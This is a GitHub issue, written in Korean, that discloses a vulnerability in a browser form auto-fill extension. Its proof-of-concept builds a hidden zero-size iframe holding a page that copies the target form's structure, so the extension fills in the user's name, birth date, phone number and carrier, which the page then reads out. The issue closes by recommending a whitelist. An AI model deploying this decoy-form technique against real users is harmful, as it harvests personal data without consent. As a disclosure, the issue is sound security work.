Skip to content

기타 사이트 취약점 #11

Open
Open
기타 사이트 취약점#11
@Xvezda

Description

@Xvezda
Xvezda
opened on Jun 23, 2025
Image

확장 프로그램을 활성화한 상태로 안전하지 않은 사이트를 접속하는것만으로 개인정보 유출이 가능한 취약점이 존재합니다.

poc: https://xvezda.com/poc/auth-auto-fill

<!DOCTYPE html>
<html lang="ko">
  <head>
    <meta charset="UTF-8" />
    <title>poc</title>
    <meta name="robots" content="noindex,nofollow" />
  </head>
  <body>
    <!-- hidden frame -->
    <iframe
      src="frame.html"
      style="display: none; width: 0; height: 0; border: 0"
    ></iframe>
  </body>
</html>
<!DOCTYPE html>
<html lang="ko">
  <head>
    <meta charset="UTF-8" />
    <title>leak</title>
    <meta name="robots" content="noindex,nofollow" />
  </head>
  <body>
    <!--
      var nameInputQuery = "#oacxEmbededContents > div:nth-child(2) > div > div.formLayout > section > form > div.tab-content > div:nth-child(1) > ul > li:nth-child(1) > div.ul-td > input[type=text]";
      var birthDate8DigitInputQuery = "#oacxEmbededContents > div:nth-child(2) > div > div.formLayout > section > form > div.tab-content > div:nth-child(1) > ul > li:nth-child(2) > div.ul-td > input";
      var birthDate6DigitInputQuery = "#oacxEmbededContents > div:nth-child(2) > div > div.formLayout > section > form > div.tab-content > div:nth-child(1) > ul > li.oacx-ssn > div.ul-td > input[type=text]:nth-child(1)";
      var phone1InputQuery = "#oacxEmbededContents > div:nth-child(2) > div > div.formLayout > section > form > div.tab-content > div:nth-child(1) > ul > li.none-telecom > div.ul-td > select:nth-child(2)";
      var phone2InputQuery = "#oacxEmbededContents > div:nth-child(2) > div > div.formLayout > section > form > div.tab-content > div:nth-child(1) > ul > li:nth-child(4) > div.ul-td > input";
      var carrierInputQuery = "#oacxEmbededContents > div:nth-child(2) > div > div.formLayout > section > form > div.tab-content > div:nth-child(1) > ul > li.telecom > div.ul-td > select.one-third.mr15";
      var agreeInputQuery = "#totalAgree";

      var nameInput = this.document.querySelector("#name");
      var phoneInput = this.document.querySelector("#telno");
      var agreeInput = this.document.querySelector("#allAgree");
    -->
    <script>
      var leak = {};

      function showMessage() {
        if (JSON.stringify(leak) === '{}') {
          alert('[-] failed');
          return;
        }
        alert(
          '[+] success\n' +
          'name: ' + leak.name + '\n' +
          'birth: ' + leak.birth8Digit?.replace(/(\d{4})(\d{2})(\d{2})/, '$1/$2/$3') + '\n' +
          'phone: ' + leak.phone1 + '-' + leak.phone2?.replace(/(\d{4})(\d{4})/, '$1-$2') + '\n' +
          'carrier: ' + {S:'SKT',K:'KT',L:'LGU+'}[leak.carrier]
        );
      }
    </script>
    <div id="oacxEmbededContents">
      <div></div>
      <div>
        <div>
          <div class="formLayout">
            <section>
              <form>
                <div class="tab-content">
                  <div>
                    <ul>
                      <!-- nameInputQuery -->
                      <li>
                        <div class="ul-td">
                          <input oninput="leak.name=this.value" type="text" placeholder="name input" />
                        </div>
                      </li>

                      <!-- birthDate8DigitInputQuery -->
                      <li>
                        <div class="ul-td">
                          <input oninput="leak.birth8Digit=this.value" placeholder="birth date 8-digit" />
                        </div>
                      </li>

                      <!-- birthDate6DigitInputQuery & rrnInputQuery -->
                      <li class="oacx-ssn">
                        <div class="ul-td">
                          <input oninput="leak.birth6Digit=this.value" type="text" placeholder="birth date 6-digit" />
                          <input type="text" placeholder="RRN back part" />
                        </div>
                      </li>

                      <!-- phone2InputQuery -->
                      <li>
                        <div class="ul-td">
                          <input oninput="leak.phone2=this.value" placeholder="phone middle digits" />
                        </div>
                      </li>

                      <!-- phone1InputQuery -->
                      <li class="none-telecom">
                        <div class="ul-td">
                          <select></select>
                          <select onchange="leak.phone1=this.value">
                            <option value="010">010</option>
                            <option value="011">011</option>
                            <option value="016">016</option>
                            <option value="017">017</option>
                            <option value="018">018</option>
                            <option value="019">019</option>
                          </select>
                        </div>
                      </li>

                      <!-- carrierInputQuery -->
                      <li class="telecom">
                        <div class="ul-td">
                          <select onchange="leak.carrier=this.value" class="one-third mr15">
                            <option value="S">SKT</option>
                            <option value="K">KT</option>
                            <option value="L">LGU+</option>
                          </select>
                        </div>
                      </li>
                    </ul>
                  </div>
                </div>
              </form>
            </section>
          </div>
        </div>
      </div>
    </div>

    <!-- agreeInputQuery -->
    <input id="totalAgree" type="checkbox" onchange="showMessage()" /> <label for="totalAgree">전체 동의</label>
  </body>
</html>

기타 사이트에 대한 지원을 중단하거나 별도의 화이트리스트를 만들어서 운영하는 등의 검증과정이 필요해보입니다.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions